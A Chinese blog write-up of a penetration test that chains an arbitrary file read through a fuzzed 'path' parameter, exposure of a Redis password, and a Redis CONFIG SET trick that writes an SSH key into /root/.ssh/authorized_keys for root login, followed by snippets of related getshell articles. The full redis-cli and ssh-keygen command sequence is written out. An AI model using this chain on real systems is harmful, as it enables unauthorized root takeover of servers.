分析Js到GetShell

最新推荐文章于 2024-09-04 20:46:54 发布
原创 最新推荐文章于 2024-09-04 20:46:54 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #js

本文通过一个具体案例展示了如何在测试过程中发现并利用系统漏洞,包括利用F12全局搜索发现潜在接口、使用burp抓包分析、利用x8FUZZ工具进行参数测试、读取敏感文件内容、发现并利用SSH端口及密钥登录方式、通过Redis进行权限提升等步骤。

声明 

   免责声明:本文为个人作品,只做技术研究,只可用于正常的技术交流与学习,不可用于灰黑产业,不可从事违法犯罪行,严禁利用本文所介绍的技术进行未授权的恶意攻击,否则,后果自负!!!

测试某系统,常规的功能点完后,发现没有什么有价值的洞,

F12 全局搜索 download 发现一处get接口

 使用burp访问发现500错误,应该是缺少参数

 使用x8 FUZZ参数

两秒之后 就出结果,发现存在path 参数

 访问之,提示文件不存在,有戏

尝试访问 etc/passwd,成功读取

 

读root用户的hisotry,发现开了10022 作为ssh端口

开启了 密钥登陆

 存在redis

 

读取redis密码

 

nmap发现6379也是开放,既然是root账户 直接 写个ssh公钥进去

 


ssh-keygen -t rsa
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > /tmp/key.txt
cat key.txt|redis-cli -h xxx.xx.xx.xx -a 'Pxxx3' -x set crack

# 链接redis
redis-cli -h xxx.xx -a 'Paxxxx123'


#获取redis备份的路径
CONFIG GET dir  # 截图忘记

#更改redis备份路径
CONFIG SET dir /root/.ssh

#设置备份文件的名称为authorized_keys
CONFIG SET dbfilename authorized_keys

#检查是否更改
CONFIG GET dbfilename
# 保存
save

 ssh -p10022 root@xxx.xxx.xxx 成功链接

 

 

dede ad_js.php getshell,nday漏洞还原分析之dedecms后台getshell
weixin_34151001的博客
03-29 665
前言最近发现 dedecms 的 nday后台getshell ,于是打算还原一下。根据日志显示,攻击者访问了 dede/ad_add.php 文件后,转而访问 plus/ad_js.php 文件,提交的 payload 为 plus/ad_js.php?nocache=1&aid=1&_=whoami 。前期准备我们先来看一下 dede/ad_add.php 文件。可以看到这是一...
74CMS 5.0.1后台getshell(CVE-2020-35339)分析
qq_41252520的博客
02-18 3282
0x0 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的
jsgetshell
weixin_50464560的博客
07-22 734
看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬挖的干干净净了。没有内网VPN基本上挖不到,然后我就去公众号看了一下,找到了一个系统 首先来点团队特色F12大法,查看html源码发现一处js 发现登录后直接跳转这个地址 直接访问看看有没有未授权漏洞http://xx.xx.xx.xx/index.jsp 访问了好吧,是首页。。打扰了但是我不甘心,我再用F12大法,发现了index.js 访问http://xx.xx.xx.xx/index.
SRC挖掘技巧—写js代码就能getshell
pyth0zn的博客
10-16 1813
发现算法编辑器->尝试执行nodejs 代码执行->发现调用得是java Nashorn引擎->写js代码调用java 方法执行代码->over!继续看资料 发现 通过 框架可以通过js创建java 对象 使用关键字 Java.type 就可以。通过上面报错发现用了java的框架 来执行js 查一下api 教程 ,参考如下资料。发现后端用的node js,尝试写一个nodejs 代码执行。查看格式化按钮旁边的【查看帮助接口】 看到里面写的特别像js 代码。打开后看看,可以写代码。用以下样例脚本测试下。
js跳转https_从JS敏感信息泄露到GETSHELL
weixin_36424234的博客
12-08 282
亲爱的,关注我吧11/3文章共计742个词预计阅读8分钟来和我一起阅读吧作者:果酸为首的苹果本文转自先知社区:https://xz.aliyun.com/t/8441前言小弟新手,大佬勿喷,文章有何不妥,还望大佬们斧正。正文前端时间打HW,拿到一个IP,先在FOFA上搜一下发现这个IP现在开放了三个端口,分别是86,83,82对应不同的后台管理系统先从86端口这个系统入手,界面如图没有验...
实战|全程分析jsgetshell
qq_50854662的博客
09-28 338
本篇转载于https://forum.butian.net/share/260 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusrc的时候收集了一波山理的子域资产,全部看了一遍都被大佬挖的干干净净了。没有内网VPN基本上挖不到,然后我就去公众号看了一下,找到... 看到望海师傅的山理证书真滴好看,真想搞一本,刚刚入edusr
JS敏感信息泄露到GETSHELL
weixin_50464560的博客
08-18 510
前言 小弟新手,大佬勿喷,文章有何不妥,还望大佬们斧正。 正文 前端时间打HW,拿到一个IP,先在FOFA上搜一下 发现这个IP现在开放了三个端口,分别是86,83,82对应不同的后台管理系统 先从86端口这个系统入手,界面如图 没有验证码!我喜欢,掏出我的大宝贝300万大字典对着admin就是一顿爆,然而现实是残酷的。。。 搞不到弱密码,随手查看了一下源代码,发现这里登录成功跳转index.html 直接URL输入xxx.xxx.xxx.xxx:86/index.h...
记一次代码审计之nbcio-boot从信息泄露到Getshell
persist213的博客
09-04 1794
NBCIO 亿事达企业管理平台后端代码,基于jeecgboot3.0和flowable6.7.2,初步完成了集流程设计、流程管理、流程执行、任务办理、流程监控于一体的开源工作流开发平台,同时增加了聊天功能、大屏设计器、网盘功能和项目管理。项目地址:https://gitee.com/nbacheng/nbcio-boot。
【Vulfocus解题复现】tomcat-pass-getshell 弱口令
温氏效应
11-15 4060
漏洞介绍 名称:Tomcat-pass-getshell 弱口令 描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat 2、拖动页面,找到war上传区域,上传jsp木马: 制作jsp木马,.
[Vulfocus解题系列]Tomcat-pass-getshell 弱口令
00勇士王子的博客
07-04 3231
漏洞介绍 名称:Tomcat-pass-getshell 弱口令   描述: Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1.打开题目环境 2.既然是弱口令,那首先要先尝试登陆,点击 Manager App 3.弹出登陆窗口 4.尝试弱口令tomcat/tomcat 5.登陆成功: 可以在上图
任意文件上传getshell
Websec
03-21 8942
漏洞描述:任意文件上传顾名思义就是在文件上传的地方能够上传任意类型的文件,我们可以上传恶意木马文件对其服务器进行攻击。漏洞寻找:通过查看文件上传的地方,通过burpsuite抓包分析其上传点对其文件类型是否做了限制,也可能只是做了前端限制,但是这个都不要紧,直接绕过就行漏洞修复建议:1.文件上传的地方,我们需要对其文件格式做白名单限制,只允许我们需要的文件进行上传即可2.对文件格式进行校验,前端以...
html页面执行shell,经过CGI实如今Html页面上执行shell命令
weixin_42498055的博客
06-04 1133
在mac上配置cgi(不用系统自带的apache cgi.)安装cgi1. brew update2. brew install httpd24安装完后,会有以下提示htmlDocumentRoot is /usr/local/var/www.shellThe default ports have been set in /usr/local/etc/httpd/httpd.conf to 808...
html预览 webshell,RTLO技术与HTML文件是否可以变为WEBSHELL
weixin_28791139的博客
06-28 613
一、浅谈RTLO技术我在FreeBuf上到了 [APT攻击]趋势科技捕获一次APT攻击活动 这篇文章,然后就自己去探探究竟,文章地址在下面RLO控制符是Unicode控制符的一种,使得字符显示从右至左的顺序,攻击者可以利用RTLO技术来达到欺骗目标,从而使得可执行文件的运行。首先Windows系统在解析文件名时,当遇到unicode控制符时,会改变文件名的显示方式,利用这一特性,可以将exe、sc...
html预览 webshell,2020-04-29后门分析、获取webshell的方法
weixin_39747721的博客
06-28 558
大马后门分析首先搭建一个木马将文件拖入虚拟机中当我们登录的时候输入一个错误的密码,提示非法登录查看代码,找出关键字,并将代码复制到新记事本中,将execute换成msgbox然后保存,将文件名改为11.vbs后缀名,然后打开11.vbs文件,ctrl+A ctrl+C ctrl+V 复制粘贴到新建记事本中6 8是后门这是一个后门%号后门又一个后门网页地址后门然后我们将搭建好的后门,进行...
html 上传文件_【实战篇】记一次文件上传漏洞绕过
weixin_39636099的博客
11-25 1514
点击上方“公众号” 可以订阅哦!Hello,各位小伙伴大家好~最近有点高产似母猪~那今天就少写点,简单记录一个文件上传漏洞的绕过吧~(机智如我..)之前也介绍过一期文件上传漏洞:【文件上传与解析】文件上传与解析漏洞总结v1.0一起来看看今天的内容吧。Part.1漏洞挖掘漏洞测试 目标站点登陆后可以上传公司logo:先随意上传一张图片://可以看到文件被重命名了,但返回了路径。直接访问路径...
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3917
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 3590
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
使用Javascript shell解释执行js代码
weixin_41763944的博客
08-06 4274
最近,算法小白在跟着《数据结构与算法javascript描述》这本书学习算法知识。 首先,小白就被难住了。这个js shell是个什么玩意儿。故鼓捣了半天,又几个小时过去了。。。 终于会用了。。写下来,大家自取。也是为了让我自己不会忘记。。。毕竟记性不大忘性大的我。。 1.下载一个符合自己电脑系统的js shell,书里的地址尝试了半天并没有打开,心塞塞,我以为我学校的网络崩掉了。下面的地址...
GETSHELL学习总结
weixin_44508748的博客
06-29 4771
分类 带有漏洞的应用 redis 、tomcat、解析漏洞、编辑器、FTP 常规漏洞 sql注入、上传、文件包含、命令执行、Struts2、代码反序列化 后台拿shell 上传、数据库备份、配置插马 关于各种带有漏洞的应用以及OWASP Top10常规漏洞需要不断的积累,打造自己的核心的知识库,道路且长。本文仅记录最近对常见cms后台getshell的学习总结 网站getshell方法 1.数据库备份拿shell 如果网站后台具有数据库备份功能,可以将webshell格式先修改为允许上传的文件格式如jpg,
vue getshell
最新发布
04-01
<think>好的,用户现在在询问Vue.js中获取shell权限的方法或漏洞利用。我需要仔细分析这个问题,确保回答准确且不误导用户。 首先,用户可能对Vue.js的安全机制不太了解,误以为Vue.js本身可能存在直接获取shell权限的漏洞。Vue.js是一个前端框架,主要用于构建用户界面,它运行在客户端浏览器中,本身并不直接处理服务器端权限或系统shell访问。因此,直接通过Vue.js获取shell权限的可能性极低,除非存在其他服务器端或构建工具链的漏洞。 接下来,我需要检查用户提供的引用内容。引用[1]、[2]提到了npm和webpack的安装,引用[3]涉及前端操作DOM获取隐藏输入值,引用[4]讨论了密码认证机制。这些引用中并没有提到Vue.js本身有获取shell权限的漏洞,反而更多涉及构建工具和系统安全。因此,用户的疑问可能源于对Vue.js生态中其他环节的误解,比如构建工具配置不当或服务器端漏洞。 然后,需要考虑用户可能的真实需求。用户可能在寻找如何通过前端漏洞执行系统命令,但需要明确告知这在常规情况下几乎不可能,除非存在严重的配置错误或第三方依赖漏洞。例如,如果开发者在Vue项目中使用了不安全的Node.js包,或者在服务器端未正确过滤输入,可能导致RCE漏洞。此外,构建工具如webpack的配置错误也可能引入风险,但这不是Vue.js本身的问题。 还需要提醒用户安全实践的重要性,比如避免使用危险函数如eval(), sanitize用户输入,定期更新依赖等。同时,要引导用户正确区分前端与后端的安全责任,避免混淆。 最后,生成相关问题时要围绕Vue.js安全、前端漏洞防护、构建工具安全等方面,帮助用户扩展相关知识,确保他们理解安全问题的实际来源和防护措施。</think>针对您提出的问题,需要明确以下技术边界和安全规范: ### 技术边界澄清 1. **Vue.js 前端框架特性** Vue.js 是纯前端JavaScript框架,运行在浏览器沙箱环境中,**不具备直接访问操作系统shell的权限**。浏览器安全机制(如CORS、同源策略)严格限制前端代码与本地系统的交互[^4]。 2. **漏洞利用可能性分析** - **常规场景**:Vue单页应用通过API与后端交互,若后端存在远程代码执行(RCE)漏洞,才可能间接实现系统命令执行 - **特殊攻击面**:构建工具链(如webpack、vue-cli)若存在配置错误,可能通过恶意npm包触发攻击。例如: ```bash # 恶意npm包可能通过postinstall脚本执行系统命令 npm install malicious-package ``` 引用[1][2]中的工具链需严格验证来源[^1][^2] ### 安全防护建议 1. **输入过滤** 对`v-model`绑定的输入值使用消毒库: ```javascript // 使用DOMPurify防止XSS import DOMPurify from 'dompurify'; this.cleanInput = DOMPurify.sanitize(rawInput); ``` 2. **依赖管理** 使用`npm audit`定期检查依赖: ```bash npm audit --production ``` 3. **服务端防护** 在Node.js后端使用参数化查询: ```javascript const { exec } = require('child_process'); exec('ls ' + userInput); // 高危!应严格过滤userInput ``` ### 典型漏洞场景 ```javascript // 危险示例:通过eval执行用户输入 methods: { unsafeEval() { const cmd = this.userInput; eval(cmd); // 绝对禁止在前端使用 } } ``` 此类代码可能通过DOM操作间接触发XSS,但无法突破浏览器沙箱[^3][^4]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

pyth0nn

送人玫瑰,手留余香

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值